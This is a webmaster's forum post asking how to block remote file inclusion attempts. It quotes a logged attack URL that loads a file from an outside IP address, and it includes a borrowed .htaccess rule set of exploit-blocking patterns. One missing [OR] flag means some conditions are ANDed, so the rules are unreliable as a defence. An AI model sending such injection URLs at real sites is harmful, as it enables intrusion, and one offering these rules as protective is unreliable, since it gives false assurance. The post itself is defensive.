Hello there,
Today I've found several attempt to access the following url on my website:
/index.php?file-download=http://213.246.61.125:2082/index.html?
After googleing a bit it seems that in some cases, using this attack, the bag guy is able to change the code in some of your files.
it also seems to affect
only a certain version of oScommerce.
I don't use oScommerce, so I do believe that I'm on the safe side, but it's not the first time that I see some similar attempt of attack on my website.
So to protect my self I was wondering if using .htaccess restriction would be enough?
At the moment I'm using the following: (that I've found on an other forum)
Code:
########## Begin - Rewrite rules to block out some common exploits
#
RewriteEngine on
Options +FollowSymLinks
#
# Block out any script trying to base64_encode
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Block hackers trying a redirect via cPath
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC]
#Block attempt to redirect to /self
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC]
#
RewriteRule ^.* - [F]
#
########## End - Rewrite rules to block out some common exploits
But I do think that these rewrite string are more specificity write to protect oScommerce site.
Any advice on how to protect my web site from such attach and similar?
Best regards,
Angel.
